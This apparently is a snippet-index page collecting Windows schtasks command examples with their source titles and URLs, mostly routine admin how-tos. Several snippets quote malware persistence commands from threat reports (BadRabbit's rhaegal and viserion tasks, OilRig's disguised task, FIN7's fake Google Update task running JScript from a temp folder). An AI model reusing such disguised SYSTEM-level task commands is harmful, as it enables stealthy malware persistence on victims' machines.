    「BADRABBIT」ランサムウェアを「BACKSWING」から紐解く « 「BADRABBIT」ランサムウェアを「BACKSWING」から紐解く | FireEye Inc : http://www.fireeye.com/blog/jp-threat-research/2017/11/backswing-pulling-a-badrabbit-out-of-a-hat.html
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "<%COMSPEC%> /C Start \"\" \"\" -id
    「BADRABBIT」ランサムウェアを「BACKSWING」から紐解く | FireEye : http://www.fireeye.jp/company/press-releases/2017/backswing-pulling-a-badrabbit-out-of-a-hat.html
SCHTASKS /Create /
    Windows Server 2003で死活監視メモ [Windows Server 2003](fkimura.com) : http://www.fkimura.com/windows-server-2003-schedule-a0.html
schtasks /create /S \\mypc /U hogeUser/P hogePass /SC ONCE /TN test /TR "cmd /k \"time /t\"" /ST 00:00:00
    リモートPCでコマンドをすぐさま実行したいとき。 - gstudio - blog : http://www.gstudio.me/blog/2009/09/pc-2.html
schtasks /create /tn "Startup PowerShell" /tr c:\Startup.bat /sc onstart /ru SYSTEM
    Windows IoT Core: Running a PowerShell Script on Startup - Hackster.io : http://www.hackster.io/falafel-software/windows-iot-core-running-a-powershell-script-on-startup-0aa534
SchTasks /Create /SC DAILY /TN
    How to Create, Modify and Delete Scheduled Tasks from the Command Line  : http://www.howtogeek.com/51236/how-to-create-modify-and-delete-scheduled-tasks-from-the-command-line/
schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR "%ws" /ST %02d:%02d:00
    Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for '1.exe'  : http://www.hybrid-analysis.com/sample/8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93@environmentId=100
schtasks /create /tn "Test Cron Job" /tr "C:\test.bat" /sc daily /ru
    IBM SmarterCloud Enterprise+ についてのヒント: TSAM と Cygwin を使用して Windows にソフトウェアをインストールする : http://www.ibm.com/developerworks/jp/cloud/library/cl-tsamcygwininstall/index.html
schtasks /Create /
    Computer Management | Mastering Administration | InformIT : http://www.informit.com/articles/article.aspx@p=758416&seqNum=3
schtasks /create /tn "Application_Name" /tr c:\apps\Application_Name /sc Value /st HH:MM:SS /ed MM/DD/YYYY
    Phil's NewsPhlash: HOW TO: Use Schtasks.exe to Schedule Tasks in Windows Server 2003 : http://www.intrasection.com/2005/08/how-to-use-schtasksexe-to-schedule.html
schtasks /Create /
    Task Scheduler – IoT Developer : http://www.iot-developer.net/windows-iot/windows-iot-general/os-tasks/task-scheduler
schtasks /create /sc minute /mo 1 /tn "Hello World" /tr \\Server\scripts\helloworld.vbs
    LazyWinAdmin: Run this Scheduled Task every minute !!! : http://www.lazywinadmin.com/2012/03/run-this-task-every-minute.html
schtasks /create /TN "mdumpfs - daily backup" /SC DAILY /ST 03:00:00 /RU SYSTEM /TR "D:\temp\mdumpfs\mdumpfs.exe \"D:\Documents and Settings\" C:\backup"
    mdumpfs - Misuzilla.org : http://www.misuzilla.org/Distribution/mdumpfs/
SCHTASKS /Create /S system /U user /P password /RU runasuser
    Can't get schtasks.exe to work in Windows 7 | The OpenEdge Hive : http://www.oehive.org/node/2069
SchTasks /Create /SC MINUTE /MO 3 /TN "InetlSecurityAssistManager" /TR "wscript %path%" /f
    OilRigがThreeDollarsを使用して新たなトロイの木馬OopsIEを配信 - Palo Alto Networks : http://www.paloaltonetworks.jp/company/in-the-news/2018/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan
schtasks /create /tn
    Windows Server 2016 - Schedule a Reboot | PeteNetLive : http://www.petenetlive.com/KB/Article/0001321
SchTasks /Create /S %%M
     User-created (sch)tasks Invisible When Run - Petri IT Knowledgebase Forums  : http://www.petri.com/forums/forum/windows-scripting/general-scripting/39124-scripting-the-creation-of-complex-scheduled-tasks
schtasks /Create /tn
    PowerShell Magazine » Managing scheduled tasks in your environment – Part II : http://www.powershellmagazine.com/2011/11/22/managing-scheduled-tasks-in-your-environment-part-ii/
schtasks /create /tn freshreader /tr "C:\php\php-cgi.exe -f \"c:\program files\apache group\Apache\htdocs\freshreader\crawler.php\"" /sc MINUTE /mo 15 /st 00:00:00 /ru "System"
    WindowsR XP 環境での Fresh Reader のインストールについて | よくあるご質問(FAQ) | PROFACE : http://www.proface.com/support/index@page=content&country=PROFACE&lang=ja&locale=ja_JP&id=FA227413
schtasks /create /f /tn ""GoogleUpdateTaskMachineCorefh5evfbce5bhfd37"" /tr ""wscript.exe //b /e:jscript %TMP%\debug.txt "" /sc ONCE /st ""05:00"" /sd ""12/12/1990""
    FIN7/Carbanak threat actor unleashes Bateleur JScript backdoor | Proofpoint : http://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor
SCHTASKS /Create /
    Any 3rd party at command substitute for Windows 10? 'The AT command has been deprecated. Please use schtasks.exe instead.' - Quora : http://www.quora.com/Any-3rd-party-at-command-substitute-for-Windows-10-The-AT-command-has-been-deprecated-Please-use-schtasks-exe-instead
schtasks /create /RU "NT AUTHORITY\SYSTEM" /SC MINUTE /MO 15 /ST 08:00 /TN
    reddit: the front page of the internet : http://www.reddit.com/r/Windows10/comments/7j4ai1/a_script_to_stop_windows_from_rebooting_itself/
schtasks /create /tn "HowToTask" /tr c:\temp\test.cmd /sc once /st 00:00:00 /sd 2022/01/01 /ru username /rp password
    Schedule or run a Windows task - Real's Java How-to : http://www.rgagnon.com/javadetails/java-schedule-or-run-a-windows-task.html
schtasks /create /tn "Defrag C" /sc DAILY
    24.7. Manage Scheduled Tasks on a Computer - Windows PowerShell Cookbook [Book] : http://www.safaribooksonline.com/library/view/windows-powershell-cookbook/9780596528492/ch24s08.html
schtasks /create /tn mytask /SC HOURLY /TR "calc"
    Running Code From A Non-Elevated Account At Any Time « Thoughts on Security : http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/
schtasks /Create /
    Linux to Windows Server - Migrating and securing your crontab 揃 Simon Holywell : http://www.simonholywell.com/post/2009/01/linux-to-windows-server-migrating-and-securing-your-cron/
SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword /SC HOURLY /TN rtest1 /TR notepad
    Windowsての自動化の手段 : http://www.slideshare.net/ikawasho/windows-44952663
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "%SYSTEM%\cmd.exe /C Start \"\" \"%Windir%\dispci.exe\" -id [NUMBER]
    Ransom.BadRabbit | Symantec : http://www.symantec.com/security_response/earthlink_writeup.jsp@docid=2017-102503-0423-99
SCHTASKS /Create /
    Re: batch file for Task scheduler in server2003 : http://www.tech-archive.net/Archive/Windows/microsoft.public.windows.server.scripting/2007-02/msg00012.html
SCHTASKS /Create /RU
    How to Schedule a PC shutdown : http://www.techieshelp.com/schedule-a-pc-to-shutdown/
schtasks /create /sc once /tn Reboot /tr
    How to Schedule a reboot of Windows server | Techwork.dk : http://www.techwork.dk/servers/how-to-schedule-a-reboot-of-windows-server
schtasks /create /tn "
     schtasks.exeで引数付きのexeを指定する方法 | システム開発ブログ | webシステム開発のトラストシステム : http://www.trust.or.jp/Public/Blog.aspx@ArticleNo=13
schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 1550063777
     Bad Rabbit Ransomware | VMRay Analyzer Report  : http://www.vmray.com/analyses/bad-rabbit-ransomware-flash-analysis/report/overview.html
schtasks /create /tn "PeriodicLockScreen" /tr "rundll32.exe user32.dll
    OpenSim - A tool for modeling and simulation of musculoskeletal systems : http://www.vvr.ece.upatras.gr/stanev/blog/eye_relief.html
SCHTASKS /Create /SC WEEKLY /D TUE /TN TEST /TR F:\test.bat /ST 13:00
    Windowsのコマンドプロンプトによるタスクの作成・変更・削除をする方法(schtasks) : http://www.wannko.net/command/etc/schtasks.html
Schtasks /create /RU administrator /RP adminpassword /SC weekly /D SAT /TN defrag /TR c:\windows\system32\defrag.exe /ST 10:00:00
    Schedule tasks from command line : http://www.windows-commandline.com/schedule-tasks-command-line/
schtasks /create /
    Windows - schedule tasks in command line using schtasks - YouTube : http://www.youtube.com/watch@v=g-rwKv-_Ypo
SCHTASKS /CREATE /s
    DOSコマンド/タスク管理(schtasks) - tak_ism - アットウィキ : http://www51.atwiki.jp/tak_is/pages/38.html
schtasks /create /tn "Restart Daily" /tr "shutdown.exe -r -f" /sc daily /st 01:00:00
    Microsoft製品 > コマンドプロンプト:タスク・スケジューラを制御する - YiaoWang : http://yiaowang.web.fc2.com/programing/microsoft/cmd_schtasks.html
schtasks /create /tn New1 /tr C:\aaa\bbb.bat /sc hourly /mo 12 /st 02:00:00
    コマンドプロンプトを使ってみよう! −設定・システム操作− : http://ykr414.com/dos/dos04.html
schtasks /create /tn HelloTask /tr C:\Temp\HelloTask.exe /sc MINUTE]
    YMLib - C# - タスクスケジューラー : http://ymlib.com/YMWorld/CS/P1/W3/P134/YMWCS134.html

schtasks のオプション一覧